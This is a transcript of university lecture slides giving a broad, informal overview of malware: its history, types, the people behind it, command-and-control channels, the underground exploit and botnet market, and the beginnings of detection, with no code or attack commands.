Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses...
Transcript of Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses...
![Page 1: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/1.jpg)
Malwareaka “BritneySpears.mp3.vbs”
![Page 2: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/2.jpg)
MalwareWhat is malware?
• A -ware synonym for computer viruses.
• Essentially a program that does something malicious-- hence malware.
• More currently carries the connotation of a long-lasting program.
• Encompasses a whole class of software:
• Scareware
• Ransomware
• Botnets
![Page 3: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/3.jpg)
MalwareScareware
• Software designed to make you think you’re infected with something.
• Essentially a fake anti-virus that acts as a backdoor or something more.
![Page 4: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/4.jpg)
MalwareRansomware
• Amusing abuse of encryption as a means of protection.
• Malware that hijacks your system files and asks you to send money in order to decrypt your files.
• Surprisingly effective.
![Page 5: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/5.jpg)
MalwareBotnets
• The big, bad, infamous viruses you know of today.
• Programs designed to turn a computer into a zombie for control.
• Typically used to carry out distributed denial of service attacks (DDoS) and spam.
![Page 6: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/6.jpg)
The History
![Page 7: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/7.jpg)
MalwareHistory
• It all started as a prank.
• In 1982, Richard Skrenta sabotaged pirated copies of games to give to his friends.
• Friends wised up-- he writes the “Elk Cloner,” one of the first self-replicating computer viruses.
![Page 8: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/8.jpg)
MalwareHistory
• By the way...
![Page 9: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/9.jpg)
MalwareHistory
• But obviously, that’s not the platform where malware took off.
• In 1986, two brothers running a computer shop in Pakistan notice there’s code at the header of their floppy disk.
• They replace the code with their own code, which replaced the name of the floppy disk with “(c)Brain”
![Page 10: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/10.jpg)
MalwareHistory
• In 1988, the Morris worm spread throughout the Internet.
• It exploited vulnerabilities in finger, sendmail and weak passwords on the given systems.
• Due to a flaw in the way the code spread, it caused a surprising amount of damage.
![Page 11: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/11.jpg)
MalwareHistory
• More viruses started to show up after (c)Brain and Morris.
• .COM and .EXE files started getting infected.
• “Cascade” became the first virus to start hiding code by encrypting itself before running.
![Page 12: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/12.jpg)
MalwareHistory
• Viruses soon began exhibiting anti-detection techniques.
• The “1260” virus started to exhibit anti-detection techniques by masking strings within itself.
• The Whale virus exhibited polymorphism, rewriting itself at run-time to look different every time it was executed.
![Page 13: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/13.jpg)
MalwareHistory
• And then came...
![Page 14: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/14.jpg)
MalwareHistory
• Surprisingly, viruses died down.
• Most viruses were written for DOS/Unix-based systems. The DOS viruses typically crashed the computer before Windows got a chance to fully boot.
• Boot sector viruses-- for the time being-- mostly become endangered species.
![Page 15: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/15.jpg)
MalwareHistory
• Office programs on Windows became popular.
• Macro viruses started popping up.
• The aptly-named Concept virus simply replicated itself, then popped up the message “That’s enough to prove my point.”
![Page 16: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/16.jpg)
MalwareHistory
• Then came the Melissa virus.
• Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows Systems.
• Word and Excel-- the most popular office programs at the time-- were both susceptible.
![Page 17: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/17.jpg)
MalwareHistory
WORD/Melissa written by Kwyjibo Works in both Word 2000 and Word 97 Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!Word -> Email | Word 97 <-> Word 2000 ... it's a new age!
![Page 18: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/18.jpg)
The Evolution
![Page 19: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/19.jpg)
MalwareEvolution
• The term “virus” was first coined in 1983.
• Because of boot-sector and file modifications many programs exhibited, the easiest way to describe these programs was to call them a virus.
• Interestingly, as time went on, viruses came to quite literally evolve to reflect their biological definition.
![Page 20: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/20.jpg)
MalwareEvolution
• A biological virus is:
• something that spreads rapidly and effectively
• something that lives for long periods of time on its host
• something that leeches resources from its host
![Page 21: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/21.jpg)
MalwareEvolution
• Anonymity of the Internet makes malware quite interesting from a biological standpoint.
• Obviously they’re created by someone’s hand, but they’re faceless.
• They do exactly what they were designed to do and nothing more.
![Page 22: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/22.jpg)
MalwareEvolution
• The early stages of malware and viral development, after the “prank” stage moved onto the destructive stage.
• The intent of the virus was to infect and destroy.
• The Chernobyl virus, once installed, destroyed the firmware of the motherboard of the host system.
![Page 23: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/23.jpg)
MalwareEvolution
• The discovery of generalized exploitation of flaws in combination with a poorly secured Windows operating system caused malware to evolve rapidly from the late nineties onward.
• AlephOne and Smashing the Stack for Fun and Profit
• Worms and viruses began spreading with more intent than destruction and modification.
![Page 24: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/24.jpg)
MalwareEvolution
• Macro viruses were essentially documents-- this made it more likely for the viruses to spread.
• Stupid people exist. By that virtue, stupid people will do stupid things. Like opening files from people they don’t even know.
• People would open BUSHJO~1.DOC thinking they’d be getting some hilarious jokes about Bush Sr. and *poof*
![Page 25: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/25.jpg)
MalwareEvolution
• By the late 90s, worms evolved from just spreading to staying for long periods of time on their hosts.
• They served specific purposes, such as existing as a back door or running a mail server.
• These arbitrary mail servers also allowed for the automated e-mailing of malware programs.
![Page 26: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/26.jpg)
MalwareEvolution
• By the 21st century, worms and viruses stopped being solely destructive.
• High-profile worms such as Code Red spread with the purpose of doing Bad Things.
• There was money to be made and systems to control.
![Page 27: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/27.jpg)
MalwareEvolution
• Malware is in a constant state of back-and-forth between being detected and being infected.
• This directly reflects the natural evolution of viruses.
![Page 28: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/28.jpg)
The CharactersThe jerks who keep you up at night.
![Page 29: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/29.jpg)
MalwareMotivations
• Curiosity and knowledge
• VX/Heavens
• Amusement
• “That’s enough to prove my point”
• Destruction
• Power
• Money
![Page 30: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/30.jpg)
MalwareBotkids
• Typically from EFnet, but exist in pretty much every IRC network
• PP4L and GNAA have a few botkids among their ranks
• Used mostly for chat-spamming/DDoS
• One of the main reasons why IRC usage is irrationally banned from most networks
![Page 31: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/31.jpg)
MalwareUbisoft
• Ubisoft implements online-based DRM scheme.
• Botkids DDoS the hell out of it.
• People get angry.
• Botkids win.
![Page 32: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/32.jpg)
MalwareScientology
• /b/tards have everyone from botkids to botmasters.
• /b/ implemented something rather amusing-- the consensual botnet.
• People literally installed programs onto their computers for a botmaster to help them DDoS Scientology.
• I’m totally serious.
• People actually did this.
![Page 33: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/33.jpg)
MalwareRooters
• Some of the people you should thank for your free music and movies.
• People who hijack a server on a beefy pipe and install rootkits.
• Typically where piracy topsites run their distribution operations.
![Page 34: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/34.jpg)
Malware
![Page 35: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/35.jpg)
MalwareRooters
• These guys obviously want to hide from authorities.
• Computers get infected to bounce through for anonymity’s sake, creating a long chain of infected computers that ultimately mask where they’re coming from or connecting from.
• Think of it like a private, illegal TOR network.
![Page 36: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/36.jpg)
MalwareOrganized Crime
• “Nice website you got here. Be a shame if someone DDoS’d it...”
• Botnets typically used for extortion and fraud.
• Targetted malware that does nothing more than sniff social security numbers, credit card information and more.
![Page 37: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/37.jpg)
MalwarePolitics
• Russian government entities have gone to black-hats in their country to take down dissidents.
• Numerous inter-country incidents have occurred over the years involving computer warfare.
![Page 38: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/38.jpg)
MalwareThe Estonia Incident
• Estonia seriously wants a statue. Seriously, seriously wants a statue.
• Russian nationalists don’t like this.
• The entire country of Estonia is knocked off the Internet.
![Page 39: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/39.jpg)
MalwareRussia vs. Georgia
• Well-known Georgian blogger starts commenting on the Georgian-Russian conflict in 2009.
• Russian nationalists don’t like this.
• So they attack Blogger, Twitter, Facebook and LiveJournal, successfully taking down the websites for hours and even days on end.
![Page 40: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/40.jpg)
MalwareChina and Project Aurora
• Chinese hackers want source code, among other things.
• They perform a targetted attack on Adobe, Google and many other software companies through PDF files and IE.
• The attack was a success and obviously freaked out a lot of Important People.
• The true impact of the attack is still being investigated.
![Page 41: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/41.jpg)
The Game
![Page 42: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/42.jpg)
MalwareThe Game
• A majority of people honestly believe that hacking cannot be prevented. Being hacked is an act of nature.
• Think about that.
![Page 43: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/43.jpg)
MalwareThe Game
• The easiest way to spread malware is to trick the user into running the program.
![Page 44: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/44.jpg)
MalwareThe Game
• The infector does not care about sophistication or, necessarily, being as sneaky as possible.
• It works the same as spam: it doesn’t matter if 99% of people who receive the spam delete it-- it only matters that 1% buy into it and send money.
• The weakest link is the best link to attack.
• The majority of infections are caused by people willingly running them.
![Page 45: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/45.jpg)
MalwareThe Game
• While that obviously works... it can take time.
• Automated spamming of networks such as AIM and MSN will get your accounts banned.
• CAPTCHA-breaking is costly (about a dollar per image or so).
• The next step up is exploitation.
![Page 46: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/46.jpg)
MalwareThe Game
• We’re still not in remote exploits yet, though.
• Social engineering is one of the key components of hijacking someone’s system.
• Therefore, the next step is to find vulnerabilities in a piece of software that someone will open.
• Kind of like macro viruses.
![Page 47: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/47.jpg)
MalwareThe Game
• I just wanted to take the time to laugh at this bug:
• Seriously. It doesn’t stop getting old.
![Page 48: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/48.jpg)
MalwareThe Game
![Page 49: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/49.jpg)
MalwareThe Game
• Remote exploits are essentially at the bottom of the priority list.
• Current network configurations have multiple computers behind a single gateway, making remote attacks more complicated and not the most appealing vector.
![Page 50: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/50.jpg)
MalwareThe Game
• One would assume that unknown exploits-- or 0day exploits-- would be the most frequent vector. Not true.
• 0days go for a lot of money. More on that later.
• It would be unwise to waste an 0day unless the time-- or the payoff as a result of using the exploit-- warranted it.
![Page 51: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/51.jpg)
MalwareThe Game
• Because of the splintering of update systems, people find it frustrating to keep their software updated.
• So they don’t.
• And they get owned.
• This is why Conficker is still a problem.
![Page 52: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/52.jpg)
MalwareThe Game
• China and other countries in the region tend to have more infections per capita than a lot of other countries.
• This is due to the rampant piracy in the region in combination with the bad update practices many users around the world go through.
![Page 53: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/53.jpg)
MalwareThe Game
![Page 54: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/54.jpg)
MalwareTargetted attacks
• Sometimes a given network-- like Google-- is a desire of the baddies.
• Aurora was a great example.
• This is where the concept of an “advanced persistent threat” comes from.
• ...but please ignore that phrase whenever possible. It’s a marketing gimmick.
![Page 55: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/55.jpg)
The Pieces
![Page 56: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/56.jpg)
MalwareThe Pieces
• Packers originated from the 64K demoscene. They were used to compress binaries as much as humanly (or inhumanly) possible.
• Packers are now used quite frequently in malware.
• Now they come with features such as polymorphism and anti-debugging techniques.
![Page 57: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/57.jpg)
MalwareThe Pieces
• Protectors and cryptors are used to obfuscated a program at execution.
• These, too, use techniques such as polymorphism and anti-debug and analysis techniques to protect the underlying program.
![Page 58: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/58.jpg)
MalwarePackers vs. Protectors
• Packers and protectors share a lot of common threading.
• However, the core difference is purpose.
• A packer’s objective is to compress the binary. It is only a result of the packing that the program tends to be obfuscated.
• A protector does exactly what it says-- protects the program from analysis.
![Page 59: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/59.jpg)
MalwareThe Pieces
• Bots tend to come with a set of exploits in order to further spread themselves.
• These are called “exploit packs.”
• They’re usually purchased from a third-party and placed inside a bot.
![Page 60: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/60.jpg)
MalwareCommand and Control
• Command and control servers are the central locations where botnets phone home.
• They take on multiple forms.
![Page 61: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/61.jpg)
MalwareIRC-based C&C
• A good majority of botnets-- from the hundreds to the thousands to the millions-- use IRC.
• It’s a simple, text-based IRC protocol with a rich history and numerous servers and options to protect the identity of the botmaster, his bots and the control over his bots.
![Page 62: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/62.jpg)
MalwareP2P-based C&C
• IRC-based protocols, in some ways, can be really easy to smash. Not every botmaster hosts his IRC server-- and if they do, it’s easy to ask someone to take it down.
• The Storm worm specifically used a peer-to-peer protocol to control the bots in the network.
• This added extensive control that an IRC-based protocol wouldn’t.
![Page 63: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/63.jpg)
MalwareFacebook-based C&C
• Mikko Hypponen and the F-Secure team found a botnet that was using Facebook as a means of command and control.
• An SMS message was sent to a Facebook account to save a note.
• The bots had access to this Facebook account.
• Depending on the subject and the contents of the message, they carried out the master’s wishes.
![Page 64: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/64.jpg)
MalwareTwitter-based C&C
• The same idea goes for Twitter.
• Bots would follow a single account on Twitter, parse the most recent status update, then carry out the commands.
![Page 65: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/65.jpg)
MalwareTwitter-based C&C
![Page 66: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/66.jpg)
MalwareThe Pieces
• Drop-servers are typically where exploits and malware are stored to be shipped and delivered.
• In the context of browser-based exploits, this is usually where the malicious Javascript is stored.
• Like scam artists, these are usually one-stop shops. It’s set-up, drop-off and get-out all in the span of a few days or less.
![Page 67: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/67.jpg)
MalwareThe Pieces
• Rootkits are one of the most important pieces of modern malware.
• Rootkits take advantage of the detailed intricacies of the operating system to hide the malware from the user-- and, ultimately, the anti-virus software underneath.
![Page 68: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/68.jpg)
The Market
![Page 69: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/69.jpg)
MalwareThe Market
• Malware consists of many, many people. So, naturally, there exists a marketplace.
• Think of it like a war bazaar.
![Page 70: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/70.jpg)
MalwareThe Market
• Programmers sell their wares:
• Packers and protectors
• Cryptors
• Bot software
• Rootkits
![Page 71: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/71.jpg)
MalwareThe Market
• Exploit writers and researchers sell their 0day exploits to those who wish to buy.
• On the black market, this is done in private amongst people who know each other.
• Out in the open, this is done through programs such as Zero Day Initiative and iDefense.
• A good 0day can net up to $80,000 and more.
![Page 72: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/72.jpg)
MalwareThe Market
• HDMoore estimates that browser 0-days have a market price of $5,000 per 1% market share.
• Internet Explorer has around 60% market share.
• You’re CS majors-- do the math.
![Page 73: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/73.jpg)
MalwareThe Market
• Botmasters also sell and lease their botnets to anyone who wants bot-based services.
• “You want to perform a DDoS attack on Twitter? Well, that’ll take X bandwidth, which comes out to Y bots... that’ll run you about $2,000 a minute, minimum ten minutes.”
• The going rate for a single node in a botnet is about ten cents.
![Page 74: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/74.jpg)
MalwareThe Market
• Surprisingly, bot masters are more abundant than the bot authors themselves. This is probably why individual bots are so cheap.
• Obviously it’s easier to buy a bot program and use it rather than go through all the research necessary to create your own bot.
• More sophisticated botnets even come with tech-support.
![Page 75: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/75.jpg)
MalwareThe Market
• Here’s another story from Russia...
![Page 76: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/76.jpg)
Detection
![Page 77: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/77.jpg)
MalwareDetection
• Analyzing and detecting malware is a surprisingly difficult problem.
• Viruses and malware have been in an arms race for decades.
• Highly appropriate that one of the biggest malware producers in the world-- China-- is communist.
• Not to mention Russia. But I’ve already mentioned them too much.
![Page 78: Malware - California State Polytechnic University, Pomona · • Melissa and other macro viruses like it were able to spread and do their destruction to both Macintosh and Windows](https://reader033.fdocuments.us/reader033/viewer/2022042310/5ed73161c30795314c175eec/html5/thumbnails/78.jpg)
MalwareDetection
• Anti-virus engines started out by generating signatures based on specific points of memory within a given program.
• This was circumvented by polymorphism.
